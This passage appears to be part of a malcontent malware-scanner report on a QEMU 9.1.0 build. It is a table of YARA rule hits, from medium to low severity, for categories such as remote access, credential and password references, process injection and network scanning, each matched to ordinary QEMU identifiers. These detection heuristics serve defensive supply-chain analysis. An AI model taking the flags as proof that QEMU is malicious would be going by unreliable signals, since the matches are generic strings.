[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | -| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | -| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | -| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [QEMU_IS_ALIGNED](https://github.com/search?q=QEMU_IS_ALIGNED&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | 